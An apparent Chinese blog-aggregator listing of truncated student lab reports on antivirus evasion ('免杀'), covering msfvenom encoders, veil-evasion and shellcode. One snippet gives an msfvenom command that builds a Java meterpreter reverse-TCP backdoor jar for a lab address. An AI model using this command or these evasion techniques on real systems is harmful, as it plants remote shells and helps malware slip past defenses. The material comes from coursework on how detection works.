利用不同免杀方式生成文件 1.msfvenom 使用msfvenom命令查看功能介绍 其中有: p 选择一个载荷(或者叫模块) l 载荷列表 f 生成的文件格式 e 编码方式 l 编码次数 b 在生成的程序中避免出现的值 h 帮助 "msfvenom入手教学" 示例:使用msfvenom生成文件 目 ...
分类:
其他好文 时间:
2018-04-11 15:12:04
阅读次数:
172
使用msf编码器生成jar包 使用指令:msfvenom p java/meterpreter/reverse_tcp lhost=192.168.157.141 lport=5234 x 5234_backjar.jar 上传扫描的结果: 结果还行 使用veil evasion生成反弹链接的可执行 ...
分类:
其他好文 时间:
2018-04-11 00:21:00
阅读次数:
158
Exp3 免杀原理与实践 一、实践内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧; 2.通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要 ...
分类:
其他好文 时间:
2018-04-10 21:55:15
阅读次数:
481
20155338《网络对抗》Exp3 免杀原理与实践 实验过程 一、免杀效果参考基准 Kali使用上次实验msfvenom产生后门的可执行文件,上传到老师提供的网址http://www.virscan.org/上进行扫描,有48%的杀软报告病毒。 二、使用msf编码器 编码一次,在Kali输入命令 ...
分类:
其他好文 时间:
2018-04-10 21:50:26
阅读次数:
193
20155302《网络对抗》Exp3 免杀原理与实践 实验要求 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分) 2.通过组合应用各种技术实现恶意代码免杀(1分) (如果成功实现了免杀的,简单 ...
分类:
其他好文 时间:
2018-04-10 19:45:29
阅读次数:
245
2017 2018 2 20155225《网络对抗技术》实验三 免杀原理与实践 免杀工具1——msfvenom使用编码器 知道msfvenom的编码原理,就知道不管迭代编码多少次都没用,总有一段译码指令在头部,这个头部就在特征库里,一下就检测出来了。 但还是试试吧。编码方式选shikata_ga_n ...
分类:
其他好文 时间:
2018-04-09 23:05:54
阅读次数:
253
20155232《网络对抗》Exp3 免杀原理与实践 问题回答 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 特征码:一段特征码就是一段或多段数据。 如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。 启发式恶意软件检测 根据些片面特征去推断。 ...
分类:
其他好文 时间:
2018-04-08 22:36:56
阅读次数:
195
20155218《网络对抗》Exp3 免杀原理与实践 一、使用msf生成后门程序的检测 (1)将上周msf生成的后门文件放在virscan.org中进行扫描,截图如下: (2)使用msf时对它多编码1次并进行测试 发现能发现的杀软变少; (3)使用msf时对它多编码10次并进行测试 编码10次后,发 ...
分类:
其他好文 时间:
2018-04-08 19:48:56
阅读次数:
191
20154301 Exp3 免杀原理与实践 仉鑫烨 一、 实践内容 1. 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil evasion,自己利用shellcode编程等免杀工具或技巧; 2. 通过组合应用各种技术实现恶意代码免杀; 3. 用另一电脑实测,在杀软开启的情况 ...
分类:
其他好文 时间:
2018-04-08 00:26:17
阅读次数:
198
20155217《网络对抗》Exp03 免杀原理与实践 实践内容 1. 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil evasion,自己利用shellcode编程等免杀工具或技巧。 2. 通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不 ...
分类:
其他好文 时间:
2018-04-07 19:57:37
阅读次数:
124
